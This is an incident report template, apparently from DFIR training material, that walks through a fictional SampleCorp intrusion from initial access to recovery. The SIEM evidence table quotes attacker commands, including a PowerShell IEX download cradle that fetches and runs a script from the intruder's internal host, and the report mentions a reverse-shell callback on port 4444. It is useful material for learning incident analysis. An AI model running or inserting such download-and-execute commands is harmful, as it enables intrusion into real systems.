Real-world Incident Report Template

March 2024
👉 This document is “view” only. To customize the Incident Report Template, you can either download it as an offline file or
make a copy of it in your Google Drive.


Index

Real-world Incident Report        2

Executive Summary        2

Technical Analysis        5

Affected Systems & Data        5

Evidence Sources & Analysis        5

Indicators of Compromise (IoCs)        14

Root Cause Analysis        14

Technical Timeline        14

Nature of the Attack        17

Impact Analysis        22

Response and Recovery Analysis        23

Immediate Response Actions        23

Eradication Measures        24

Recovery Steps        25

Post-Incident Actions        25

Annex A        27

Technical Timeline        27


Real-world Incident Report

Executive Summary

Technical Analysis

Affected Systems & Data

Owing to insufficient network access controls, the unauthorized entity was assigned an internal IP address by simply connecting their computer to an Ethernet port within a SampleCorp office.

The unauthorized entity successfully gained control over the following nodes within SampleCorp's infrastructure:

Evidence Sources & Analysis

WKST01.samplecorp.com

On the night of April 22, 2019, at exactly 01:05:00, SampleCorp's Security Operations Center (SOC) identified unauthorized activity within the internal network. This was detected through abnormal parent-child process relationships and suspicious PowerShell commands, as displayed in the following screenshot.

From the logs, PowerShell was invoked from cmd.exe to execute the contents of a remotely hosted script. The IP address of the remote host was an internal address, 192.168.220.66, indicating that an unauthorized entity was already present within the internal network.

The earliest signs of malicious command execution point to WKST01.samplecorp.com being compromised, likely due to a malicious email attachment with a suspicious file named cv.pdf for the following reasons:

Additionally, cmd.exe and powershell.exe were spawned from wmiprvse.exe.

As already mentioned, the unauthorized entity then executed specific PowerShell commands.

Brief Analysis of 192.168.220.66

From the logs, we identified four hosts on the network segment with corresponding IP addresses and hostnames. The host 192.168.220.66, previously observed in the logs of WKST01.samplecorp.com, confirms the presence of an unauthorized entity in the internal network.

IP

Hostname

192.168.220.20

DC01.samplecorp.com

192.168.220.200

WKST01.samplecorp.com

192.168.220.101

HR01.samplecorp.com

192.168.220.202

ENG01.samplecorp.com

The below table is the result of a SIEM query that aimed to identify all instances of command execution initiated from 192.168.220.66, based on data from WKST01.samplecorp.com.

event_data.CommandLine.keyword: Descending

beat.hostname.keyword: Descending

Count

cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1555864304.02 2>&1

WKST01

5

cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\__1555864304.02 2>&1

WKST01

4

powershell.exe -nop -w hidden -c $c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX

WKST01

2

whoami

WKST01

1

...

...

...

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.220.66/test.php'); $m = Get-ModifiableService; $m

HR01

1

The results suggest that the unauthorized entity has successfully infiltrated the hosts: WKST01.samplecorp.com and HR01.samplecorp.com.

HR01.samplecorp.com

HR01.samplecorp.com was investigated next, as the unauthorized entity, 192.168.220.66, was shown to establish a connection with HR01.samplecorp.com at the earliest possible moment in the packet capture.

Network traffic details suggest a buffer overflow attempt on the service running at port 31337 of HR01.samplecorp.com.

The network traffic was exported as raw binary for further analysis.

The extracted binary was analyzed in a shellcode debugger, scdbg.

Scdbg reveals that the shellcode will attempt to initiate a connection to 192.168.220.66 at port 4444. This confirms that there has been an attempt to exploit a service running on port 31337 of HR01.samplecorp.com.

A search for network connections between HR01.samplecorp.com and the unauthorized entity was conducted using the aforementioned traffic capture file. Results revealed connections back to the unauthorized entity on port 4444. This indicates that the unauthorized entity successfully exploited a buffer overflow vuln to gain command execution on HR01.samplecorp.com.

The depth of the technical analysis can be tailored to ensure that all stakeholders are adequately informed about the incident and the actions taken in response. While we've chosen to keep the investigation details concise in this module to avoid overwhelming you, it's important to note that in a real-world situation, every claim or statement would be backed up with robust evidence.

Indicators of Compromise (IoCs)

Root Cause Analysis

Insufficient network access controls allowed the unauthorized entity access to SampleCorp's internal network.

The primary catalysts for the incident were traced back to two significant vulnerabilities. The first vulnerability stemmed from the continued use of an outdated version of Acrobat Reader, while the second was attributed to a buffer overflow issue present within a proprietary application. Compounding these vulnerabilities was the inadequate network segregation of crucial systems, leaving them more exposed and easier targets for potential threats. Additionally, there was a notable gap in user awareness, evident from the absence of comprehensive training against phishing tactics, which could have served as the initial entry point for the attackers.

Technical Timeline


Nature of the Attack

In this segment, we should meticulously dissect the modus operandi of the unauthorized entity, shedding light on the specific tactics, techniques, and procedures (TTPs) they employed throughout their intrusion. For instance, let's dive into the methods the SOC team used to determine that the unauthorized entity utilized the Metasploit framework in their operations.

Detecting Metasploit

To better understand the tactics and techniques of the unauthorized entity, we delved into the malicious PowerShell commands executed.

Particularly, the one shown in the following screenshot.

Upon inspection, it became clear that double encoding was used, likely as a means to bypass detection mechanisms. The SOC team successfully decoded the malicious payload, revealing the exact PowerShell code executed within the memory of WKST01.samplecorp.com.

By leveraging open source intelligence, our SOC team determined that this PowerShell code is probably linked to the Metasploit post-exploitation framework.

To support our hypothesis that Metasploit was used, we dived deeper into the detected shellcode. We specifically exported the packet bytes containing the shellcode (as a.bin) and subsequently submitted them to VirusTotal for evaluation.

The results from VirusTotal affirmed our suspicion that Metasploit was in play. Both metacoder and shikata are intrinsically linked to the Metasploit-generated shellcode.



Impact Analysis

In this segment, we should dive deeper into the initial stakeholder impact analysis presented at the outset of this report. Given the company's unique internal structure, business landscape, and regulatory obligations, it's crucial to offer a comprehensive evaluation of the incident's implications for every affected party.


Response and Recovery Analysis

Immediate Response Actions

Revocation of Access

Containment Strategy

Eradication Measures

Malware Removal

System Patching

Recovery Steps

Data Restoration

System Validation

Post-Incident Actions

Monitoring

Lessons Learned


Annex A

Technical Timeline

Time

Activity

April 22nd, 2019, 00:27:27

One of the employees opened a malicious PDF document (cv.pdf) on WKST01.samplecorp.com, which exploited a known vulnerability in an outdated version of Acrobat Reader. This led to the execution of a malicious payload that established initial foothold on the system.

April 22nd, 2019, 00:35:09

The unauthorized entity accessed various directories on WKST01.samplecorp.com containing both proprietary source code and API keys.

April 22nd, 2019, 00:50:18

The unauthorized entity leveraged the initial access to perform reconnaissance on the internal network. They discovered a buffer overflow vulnerability in a proprietary HR application running on HR01.samplecorp.com. Using a crafted payload, they exploited this vulnerability to gain unauthorized access to the HR system.

April 22nd, 2019, 01:30:12

The unauthorized entity located an unencrypted database on HR01.samplecorp.com containing sensitive employee and partner data, including Social Security numbers and salary information. They compressed this data and exfiltrated it to an external server via a secure SSH tunnel.

April 22nd, 2019, 02:30:11

SampleCorp's SOC and DFIR teams detected the unauthorized activities and immediately isolated WKST01.samplecorp.com and HR01.samplecorp.com from the network using VLAN segmentation.

April 22nd, 2019, 03:10:14

SampleCorp's SOC and DFIR teams plugged a host security solution to both WKST01.samplecorp.com and HR01.samplecorp.com to collect more data from the affected systems.

April 22nd, 2019, 03:43:34

The firewall rules were updated to block the known C2 IP address, effectively cutting off the unauthorized entity's remote access.

April 22nd, 2019, 04:11:00

A specialized malware removal tool was used to clean both WKST01.samplecorp.com and HR01.samplecorp.com of the deployed malware.

April 22nd, 2019, 04:30:00

All systems, starting with WKST01.samplecorp.com were updated to the latest version of Acrobat Reader, mitigating the vulnerability that led to the initial compromise.

April 22nd, 2019, 05:01:08

The API keys that were accessed by the unauthorized entity have been revoked.

April 22nd, 2019, 05:05:08

The login credentials of the user who accessed the cv.pdf file, as well as those of users who have recently signed into both WKST01.samplecorp.com and HR01.samplecorp.com, have been reset.

April 22nd, 2019, 05:21:20

After ensuring that WKST01.samplecorp.com was malware-free, the SOC team restored the system from a verified backup.

April 22nd, 2019, 05:58:50

After ensuring that HR01.samplecorp.com was malware-free, the SOC team restored the system from a verified backup.

April 22nd, 2019, 06:33:44

The development team rolled out an emergency patch for the buffer overflow vulnerability in the proprietary HR application, which was then deployed to HR01.samplecorp.com.


Real-world Incident Report Template

March 2024